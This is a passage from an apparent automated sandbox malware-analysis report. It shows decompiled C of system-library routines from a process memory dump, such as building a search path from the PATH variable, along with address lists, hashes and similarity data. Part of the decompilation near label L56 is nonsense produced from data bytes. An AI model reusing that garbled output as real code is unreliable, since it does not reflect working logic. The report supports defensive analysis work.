										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0155B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0155B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0155E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0155A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0151b171
0x0151b171
0x0151b171
0x0151b171
0x0151b171
0x0151b176
0x0151b17b
0x0151b180
0x0151b186
0x0151b18f
0x0151b198
0x0151b1a4
0x0151b1aa
0x01574802
0x01574802
0x01574805
0x0157480c
0x0157480e
0x0151b1d1
0x0151b1d3
0x0151b1de
0x0151b1de
0x01574817
0x0157481e
0x01574820
0x01574822
0x01574822
0x01574824
0x01574824
0x0157482a
0x00000000
0x00000000
0x01574835
0x0157483a
0x0157483d
0x0157483f
0x01574842
0x01574842
0x01574842
0x01574846
0x0157484c
0x0157484e
0x01574851
0x01574851
0x01574853
0x01574854
0x01574854
0x01574858
0x0157485a
0x0157485a
0x0157485d
0x0157485f
0x01574861
0x01574861
0x01574866
0x0157486b
0x0157486e
0x01574871
0x01574876
0x01574876
0x01574878
0x0157487b
0x01574884
0x01574884
0x00000000
0x0157487d
0x0157487d
0x01574882
0x01574889
0x01574889
0x0157488f
0x01574891
0x015748e0
0x015748e2
0x015748e4
0x015748e4
0x015748e7
0x015748e7
0x015748ed
0x015748f4
0x015748f6
0x01574951
0x01574951
0x01574953
0x01574953
0x01574956
0x01574956
0x01574958
0x01574959
0x01574959
0x0157495d
0x0157495d
0x0157495f
0x0157495f
0x01574965
0x01574969
0x015749ba
0x015749ba
0x015749c1
0x015749c5
0x015749cc
0x015749d4
0x015749d7
0x015749da
0x015749e4
0x015749e5
0x015749f3
0x01574a02
0x00000000
0x01574a02
0x01574972
0x01574974
0x00000000
0x00000000
0x01574976
0x01574979
0x01574982
0x01574983
0x01574984
0x0157498b
0x0157498d
0x01574991
0x01574993
0x01574999
0x0157499d
0x015749a2
0x015749a2
0x015749a2
0x01574999
0x015749ac
0x00000000
0x015749b3
0x015748f8
0x015748fe
0x00000000
0x00000000
0x00000000
0x015748fe
0x01574895
0x0157489c
0x015748ad
0x015748b2
0x015748b5
0x015748b7
0x015748ba
0x015748bc
0x015748c6
0x015748c6
0x015748cb
0x015748d1
0x015748d4
0x015748d8
0x015748d8
0x00000000
0x015748d8
0x015748be
0x015748c0
0x00000000
0x00000000
0x015748c2
0x00000000
0x00000000
0x00000000
0x015748c4
0x00000000
0x01574882
0x0157487b
0x01574904
0x01574906
0x00000000
0x00000000
0x01574908
0x0157490e
0x00000000
0x00000000
0x01574910
0x01574917
0x01574917
0x00000000
0x01574917
0x0151b1ba
0x015747f9
0x015747fc
0x00000000
0x00000000
0x00000000
0x015747fc
0x0151b1c0
0x0151b1c0
0x0151b1c3
0x0151b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 015748AD

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: ddf099b76d8cf38107aca86a7977ce81f8c91b4a0770c0b60bbe79667b5152b2
Instruction ID: c44dedeb1fa12aad6bc159699c2540e4fa08676b09d6c03e3cdc2acac4f86071
Opcode Fuzzy Hash: ddf099b76d8cf38107aca86a7977ce81f8c91b4a0770c0b60bbe79667b5152b2
Instruction Fuzzy Hash: 8151D171D0026A8FEB32CF68D846BBEBBB1BF44710F1141ADE859AF282D7704941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01542581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01542581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200400, char _a1546912080) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t253;
				signed int _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t262;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				signed int _t280;
				signed int _t283;
				signed int _t291;
				intOrPtr _t297;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t304;
				unsigned int _t307;
				signed int _t311;
				void* _t312;
				signed int _t313;
				signed int _t317;
				intOrPtr _t329;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				void* _t353;
				void* _t355;

				_t350 = _t352;
				_t353 = _t352 - 0x4c;
				_v8 =  *0x160d360 ^ _t350;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t345 = 0x160b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t307 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t297 = 0x48;
				_t327 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t338 = 0;
				_v37 = _t327;
				if(_v48 <= 0) {
					L16:
					_t45 = _t297 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t346 = 0xc0000106;
						goto L32;
					} else {
						_t345 = L01534620(_t307,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t297);
						_v52 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							_t346 = 0xc0000017;
							goto L32;
						} else {
							 *(_t345 + 0x44) =  *(_t345 + 0x44) & 0x00000000;
							_t50 = _t345 + 0x48; // 0x48
							_t340 = _t50;
							_t327 = _v32;
							 *((intOrPtr*)(_t345 + 0x3c)) = _t297;
							_t299 = 0;
							 *((short*)(_t345 + 0x30)) = _v48;
							__eflags = _t327;
							if(_t327 != 0) {
								 *(_t345 + 0x18) = _t340;
								__eflags = _t327 - 0x1608478;
								 *_t345 = ((0 | _t327 == 0x01608478) - 0x00000001 & 0xfffffffb) + 7;
								E0155F3E0(_t340,  *((intOrPtr*)(_t327 + 4)),  *_t327 & 0x0000ffff);
								_t327 = _v32;
								_t353 = _t353 + 0xc;
								_t299 = 1;
								__eflags = _a8;
								_t340 = _t340 + (( *_t327 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t291 = E015A39F2(_t340);
									_t327 = _v32;
									_t340 = _t291;
								}
							}
							_t311 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t346 = _v68;
								__eflags = 0;
								 *((short*)(_t340 - 2)) = 0;
								goto L32;
							} else {
								_t301 = _t345 + _t299 * 4;
								_v56 = _t301;
								do {
									__eflags = _t327;
									if(_t327 != 0) {
										_t253 =  *(_v60 + _t311 * 4);
										__eflags = _t253;
										if(_t253 == 0) {
											goto L30;
										} else {
											__eflags = _t253 == 5;
											if(_t253 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t301 =  *(_v60 + _t311 * 4);
										 *(_t301 + 0x18) = _t340;
										_t257 =  *(_v60 + _t311 * 4);
										__eflags = _t257 - 8;
										if(_t257 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t257 * 4 +  &M01542959))) {
												case 0:
													__ax =  *0x1608488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0155F3E0(__edi,  *0x160848c, __ax & 0x0000ffff);
														__eax =  *0x1608488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0155F3E0(_t340, _v80, _v64);
													_t286 = _v64;
													goto L26;
												case 2:
													 *0x1608480 & 0x0000ffff = E0155F3E0(__edi,  *0x1608484,  *0x1608480 & 0x0000ffff);
													__eax =  *0x1608480 & 0x0000ffff;
													__eax = ( *0x1608480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0155F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0155F3E0(_t340, _v76, _v36);
														_t286 = _v36;
													}
													L26:
													_t353 = _t353 + 0xc;
													_t340 = _t340 + (_t286 >> 1) * 2 + 2;
													__eflags = _t340;
													L27:
													_push(0x3b);
													_pop(_t288);
													 *((short*)(_t340 - 2)) = _t288;
													goto L28;
												case 6:
													__ebx =  *0x160575c;
													__eflags = __ebx - 0x160575c;
													if(__ebx != 0x160575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0155F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x160575c;
														} while (__ebx != 0x160575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1608478 & 0x0000ffff = E0155F3E0(__edi,  *0x160847c,  *0x1608478 & 0x0000ffff);
													__eax =  *0x1608478 & 0x0000ffff;
													__eax = ( *0x1608478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E015A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1606e58 & 0x0000ffff = E0155F3E0(__edi,  *0x1606e5c,  *0x1606e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1606e58 & 0x0000ffff;
													__eax = ( *0x1606e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t311 = _v16;
													_t327 = _v32;
													L29:
													_t301 = _t301 + 4;
													__eflags = _t301;
													_v56 = _t301;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t311 = _t311 + 1;
									_v16 = _t311;
									__eflags = _t311 - _v48;
								} while (_t311 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t257 =  *(_v60 + _t338 * 4);
						if(_t257 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t257 * 4 +  &M01542935))) {
							case 0:
								__ax =  *0x1608488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t327 =  &_v64;
								_v80 = E01542E3E(0,  &_v64);
								_t297 = _t297 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1608480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1608480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0152EEF0(0x16079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0152EB70(__ecx, 0x16079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t231 = _v72;
											__eflags = _t231;
											if(_t231 != 0) {
												L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t231);
											}
											_t232 = _v52;
											__eflags = _t232;
											if(_t232 != 0) {
												__eflags = _t346;
												if(_t346 < 0) {
													L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t232);
													_t232 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t307 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1607b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01534620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0152EB70(__ecx, 0x16079a0);
										__eax = _v52;
										L36:
										_pop(_t339);
										_pop(_t347);
										__eflags = _v8 ^ _t350;
										_pop(_t298);
										return E0155B640(_t232, _t298, _v8 ^ _t350, _t327, _t339, _t347);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t293 = _v56;
								if(_v56 != 0) {
									_t327 =  &_v36;
									_t295 = E01542E3E(_t293,  &_v36);
									_t307 = _v36;
									_v76 = _t295;
								}
								if(_t307 == 0) {
									goto L44;
								} else {
									_t297 = _t297 + 2 + _t307;
								}
								goto L14;
							case 6:
								__eax =  *0x1605764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1608478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1608478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1606e58 & 0x0000ffff;
								__eax = ( *0x1606e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t338 = _t338 + 1;
								if(_t338 >= _v48) {
									goto L16;
								} else {
									_t327 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t312 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_push(_t353);
					 *((intOrPtr*)(_t345 + 0x28)) =  *((intOrPtr*)(_t345 + 0x28)) + _t353;
					_push(_t353);
					_t258 = _t257 + _t353;
					asm("daa");
					 *_t345 =  *_t345 + _t350;
					 *((intOrPtr*)(_t345 + 0x28)) =  *((intOrPtr*)(_t345 + 0x28)) + _t258;
					 *0x1f015426 =  *0x1f015426 + _t258;
					_t302 = _t353;
					_t259 = _t353;
					 *((intOrPtr*)(_t259 +  &_a1530200400)) =  *((intOrPtr*)(_t259 +  &_a1530200400)) + _t327;
					_t260 = _t353;
					 *_t327 =  *_t327 + _t260;
					 *((intOrPtr*)(_t312 + _t260 - 0x80)) =  *((intOrPtr*)(_t312 + _t260 - 0x80)) - _t327;
					 *((intOrPtr*)(_t312 + _t260 - 0xa)) =  *((intOrPtr*)(_t312 + _t260 - 0xa)) - _t327;
					asm("daa");
					 *_t345 =  *_t345 + _t302;
					 *((intOrPtr*)(_t312 + _t260 + 0x4e)) =  *((intOrPtr*)(_t312 + _t260 + 0x4e)) - _t327;
					 *((intOrPtr*)(_t312 + _t260 + 0x5d)) =  *((intOrPtr*)(_t312 + _t260 + 0x5d)) - _t327;
					asm("daa");
					_t303 = _t353;
					_t262 = _t353;
					 *((intOrPtr*)(_t262 +  &_a1546912080)) =  *((intOrPtr*)(_t262 +  &_a1546912080)) + _t345;
					_t355 = _t353 + _t312;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x15eff00);
					E0156D08C(_t303, _t340, _t345);
					_v44 =  *[fs:0x18];
					_t341 = 0;
					 *_a24 = 0;
					_t304 = _a12;
					__eflags = _t304;
					if(_t304 == 0) {
						_t266 = 0xc0000100;
					} else {
						_v8 = 0;
						_t348 = 0xc0000100;
						_v52 = 0xc0000100;
						_t268 = 4;
						while(1) {
							_v40 = _t268;
							__eflags = _t268;
							if(_t268 == 0) {
								break;
							}
							_t317 = _t268 * 0xc;
							_v48 = _t317;
							__eflags = _t304 -  *((intOrPtr*)(_t317 + 0x14f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t283 = E0155E5C0(_a8,  *((intOrPtr*)(_t317 + 0x14f1668)), _t304);
									_t355 = _t355 + 0xc;
									__eflags = _t283;
									if(__eflags == 0) {
										_t348 = E015951BE(_t304,  *((intOrPtr*)(_v48 + 0x14f166c)), _a16, _t341, _t348, __eflags, _a20, _a24);
										_v52 = _t348;
										break;
									} else {
										_t268 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t268 = _t268 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t348;
						__eflags = _t348;
						if(_t348 < 0) {
							__eflags = _t348 - 0xc0000100;
							if(_t348 == 0xc0000100) {
								_t313 = _a4;
								__eflags = _t313;
								if(_t313 != 0) {
									_v36 = _t313;
									__eflags =  *_t313 - _t341;
									if( *_t313 == _t341) {
										_t348 = 0xc0000100;
										goto L76;
									} else {
										_t329 =  *((intOrPtr*)(_v44 + 0x30));
										_t270 =  *((intOrPtr*)(_t329 + 0x10));
										__eflags =  *((intOrPtr*)(_t270 + 0x48)) - _t313;
										if( *((intOrPtr*)(_t270 + 0x48)) == _t313) {
											__eflags =  *(_t329 + 0x1c);
											if( *(_t329 + 0x1c) == 0) {
												L106:
												_t348 = E01542AE4( &_v36, _a8, _t304, _a16, _a20, _a24);
												_v32 = _t348;
												__eflags = _t348 - 0xc0000100;
												if(_t348 != 0xc0000100) {
													goto L69;
												} else {
													_t341 = 1;
													_t313 = _v36;
													goto L75;
												}
											} else {
												_t273 = E01526600( *(_t329 + 0x1c));
												__eflags = _t273;
												if(_t273 != 0) {
													goto L106;
												} else {
													_t313 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t348 = E01542C50(_t313, _a8, _t304, _a16, _a20, _a24, _t341);
											L76:
											_v32 = _t348;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0152EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t348 = _a24;
									_t280 = E01542AE4( &_v36, _a8, _t304, _a16, _a20, _t348);
									_v32 = _t280;
									__eflags = _t280 - 0xc0000100;
									if(_t280 == 0xc0000100) {
										_v32 = E01542C50(_v36, _a8, _t304, _a16, _a20, _t348, 1);
									}
									_v8 = _t341;
									E01542ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t266 = _t348;
					}
					L70:
					return E0156D0D1(_t266);
				}
				L108:
			}

0x01542584
0x01542586
0x01542590
0x01542596
0x01542597
0x01542598
0x01542599
0x0154259e
0x015425a4
0x015425a9
0x015425ac
0x015425ae
0x015425b1
0x015425b2
0x015425b5
0x015425b8
0x015425bb
0x015425bc
0x015425bf
0x015425c2
0x015425c5
0x015425c6
0x015425cb
0x015425ce
0x015425d8
0x015425dd
0x015425de
0x015425e1
0x015425e3
0x015425e9
0x015426da
0x015426da
0x015426dd
0x015426e2
0x01585b56
0x00000000
0x015426e8
0x015426f9
0x015426fb
0x015426fe
0x01542700
0x01585b60
0x00000000
0x01542706
0x01542706
0x0154270a
0x0154270a
0x0154270d
0x01542713
0x01542716
0x01542718
0x0154271c
0x0154271e
0x01585b6c
0x01585b6f
0x01585b7f
0x01585b89
0x01585b8e
0x01585b93
0x01585b96
0x01585b9c
0x01585ba0
0x01585ba3
0x01585bab
0x01585bb0
0x01585bb3
0x01585bb3
0x01585ba3
0x01542724
0x01542726
0x01542729
0x0154272c
0x0154279d
0x0154279d
0x015427a0
0x015427a2
0x00000000
0x0154272e
0x0154272e
0x01542731
0x01542734
0x01542734
0x01542736
0x01585bc1
0x01585bc1
0x01585bc4
0x00000000
0x01585bca
0x01585bca
0x01585bcd
0x00000000
0x01585bd3
0x00000000
0x01585bd3
0x01585bcd
0x0154273c
0x0154273c
0x01542742
0x01542747
0x0154274a
0x0154274d
0x01542750
0x00000000
0x01542756
0x01542756
0x00000000
0x01542902
0x01542908
0x0154290b
0x00000000
0x01542911
0x0154291c
0x01542921
0x00000000
0x01542921
0x00000000
0x00000000
0x01542880
0x01542887
0x0154288c
0x00000000
0x00000000
0x01542805
0x0154280a
0x01542814
0x01542816
0x00000000
0x00000000
0x0154281e
0x01542821
0x01542823
0x00000000
0x01542829
0x01542829
0x01542831
0x0154283c
0x0154283e
0x00000000
0x0154283e
0x00000000
0x00000000
0x0154284e
0x01542850
0x01542851
0x01542854
0x01542857
0x0154285a
0x0154285c
0x0154285d
0x00000000
0x00000000
0x0154275d
0x01542761
0x00000000
0x01542767
0x0154276e
0x01542773
0x01542773
0x01542776
0x01542778
0x0154277e
0x0154277e
0x01542781
0x01542781
0x01542783
0x01542784
0x00000000
0x00000000
0x01585bd8
0x01585bde
0x01585be4
0x01585be6
0x01585be8
0x01585be9
0x01585bee
0x01585bf8
0x01585bff
0x01585c01
0x01585c04
0x01585c07
0x01585c0b
0x01585c0d
0x01585c0d
0x01585c15
0x01585c18
0x01585c1b
0x01585c1b
0x01585c1e
0x00000000
0x00000000
0x015428c3
0x015428c8
0x015428d2
0x015428d4
0x015428d8
0x015428db
0x01585c26
0x01585c28
0x01585c2d
0x01585c2d
0x00000000
0x00000000
0x01585c34
0x01585c36
0x01585c49
0x01585c4e
0x01585c54
0x01585c5b
0x01585c5d
0x01585c60
0x01542788
0x01542788
0x0154278b
0x0154278e
0x0154278e
0x0154278e
0x01542791
0x00000000
0x00000000
0x01542756
0x01542750
0x00000000
0x01542794
0x01542794
0x01542795
0x01542798
0x01542798
0x00000000
0x01542734
0x0154272c
0x01542700
0x015425ef
0x015425ef
0x015425ef
0x015425f2
0x015425f8
0x00000000
0x00000000
0x015425fe
0x00000000
0x015428e6
0x015428ec
0x015428ef
0x015428f5
0x015428f8
0x015428f8
0x00000000
0x015428f8
0x00000000
0x00000000
0x01542866
0x01542866
0x01542876
0x01542879
0x00000000
0x00000000
0x015427e0
0x015427e7
0x015427e9
0x015427eb
0x01585afd
0x00000000
0x01585afd
0x00000000
0x00000000
0x01542633
0x01542638
0x0154263b
0x0154263c
0x0154263e
0x01542640
0x01542642
0x01542647
0x01542649
0x0154264e
0x01542650
0x01542653
0x01542659
0x015426a2
0x015426a7
0x015426ac
0x015426b2
0x01585b11
0x01585b15
0x01585b17
0x00000000
0x015426b8
0x015426b8
0x015426ba
0x015427a6
0x015427a6
0x015427a9
0x015427ab
0x015427b9
0x015427b9
0x015427be
0x015427c1
0x015427c3
0x015427c5
0x015427c7
0x01585c74
0x01585c79
0x01585c79
0x015427c7
0x00000000
0x015426c0
0x015426c0
0x015426c3
0x015426c6
0x015426c6
0x015426c9
0x015426c9
0x00000000
0x015426c9
0x015426ba
0x0154265b
0x0154265b
0x0154265e
0x01542667
0x0154266d
0x01542677
0x0154267c
0x0154267f
0x01542681
0x01585b49
0x01585b4e
0x015427cd
0x015427d0
0x015427d1
0x015427d2
0x015427d4
0x015427dd
0x01542687
0x01542687
0x0154268a
0x0154268b
0x0154268e
0x0154268f
0x01542691
0x01542696
0x01542698
0x0154269d
0x0154269f
0x00000000
0x0154269f
0x01542681
0x00000000
0x00000000
0x01542846
0x00000000
0x00000000
0x01542605
0x0154260a
0x0154260c
0x01542611
0x01542616
0x01542619
0x01542619
0x0154261e
0x00000000
0x01542624
0x01542627
0x01542627
0x00000000
0x00000000
0x01585b1f
0x00000000
0x00000000
0x01542894
0x0154289b
0x0154289d
0x015428a1
0x01585b2b
0x01585b2e
0x01585b2e
0x015428a7
0x015428a9
0x01585b04
0x01585b09
0x01585b09
0x01585b09
0x00000000
0x00000000
0x01585b35
0x01585b3c
0x015428fb
0x015428fb
0x015426cc
0x015426cc
0x015426d0
0x00000000
0x015426d2
0x015426d2
0x00000000
0x015426d2
0x00000000
0x00000000
0x015425fe
0x0154292d
0x0154292f
0x01542930
0x01542935
0x01542937
0x01542938
0x0154293b
0x0154293c
0x0154293e
0x01542940
0x01542944
0x01542948
0x0154294e
0x0154294f
0x01542950
0x01542957
0x01542958
0x0154295a
0x0154295e
0x01542962
0x01542964
0x01542966
0x0154296a
0x0154296e
0x01542972
0x01542973
0x01542974
0x0154297c
0x0154297e
0x0154297f
0x01542980
0x01542981
0x01542982
0x01542983
0x01542984
0x01542985
0x01542986
0x01542987
0x01542988
0x01542989
0x0154298a
0x0154298b
0x0154298c
0x0154298d
0x0154298e
0x0154298f
0x01542990
0x01542992
0x01542997
0x015429a3
0x015429a6
0x015429ab
0x015429ad
0x015429b0
0x015429b2
0x01585c80
0x015429b8
0x015429b8
0x015429bb
0x015429c0
0x015429c5
0x015429c6
0x015429c6
0x015429c9
0x015429cb
0x00000000
0x00000000
0x015429cd
0x015429d0
0x015429d9
0x015429db
0x015429dd
0x01542a7f
0x01542a84
0x01542a87
0x01542a89
0x01585ca1
0x01585ca3
0x00000000
0x01542a8f
0x01542a8f
0x00000000
0x01542a8f
0x00000000
0x015429e3
0x015429e3
0x015429e3
0x00000000
0x015429e3
0x015429dd
0x00000000
0x015429db
0x015429e6
0x015429e9
0x015429eb
0x015429ed
0x015429f3
0x015429f5
0x015429f8
0x015429fa
0x01542a97
0x01542a9a
0x01542a9d
0x01542add
0x00000000
0x01542a9f
0x01542aa2
0x01542aa5
0x01542aa8
0x01542aab
0x01585cab
0x01585caf
0x01585cc5
0x01585cda
0x01585cdc
0x01585cdf
0x01585ce5
0x00000000
0x01585ceb
0x01585ced
0x01585cee
0x00000000
0x01585cee
0x01585cb1
0x01585cb4
0x01585cb9
0x01585cbb
0x00000000
0x01585cbd
0x01585cbd
0x00000000
0x01585cbd
0x01585cbb
0x01542ab1
0x01542ab1
0x01542ac4
0x01542ac6
0x01542ac6
0x00000000
0x01542ac6
0x01542aab
0x00000000
0x01542a00
0x01542a09
0x01542a0e
0x01542a21
0x01542a24
0x01542a35
0x01542a3a
0x01542a3d
0x01542a42
0x01542a59
0x01542a59
0x01542a5c
0x01542a5f
0x01542a5f
0x015429fa
0x015429f3
0x01542a64
0x01542a64
0x01542a6b
0x01542a6b
0x01542a6d
0x01542a72
0x01542a72
0x00000000

Strings

PATH, xrefs: 01542642, 01542691

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 91cfedd81b7e1062557a8107f25dcabd331bbc44a9215981488b6f5718ef8e8f
Instruction ID: 04f67a561ece7c42e089c74f1eb9f9537fb0656387358e7befbf7bed5e60128a
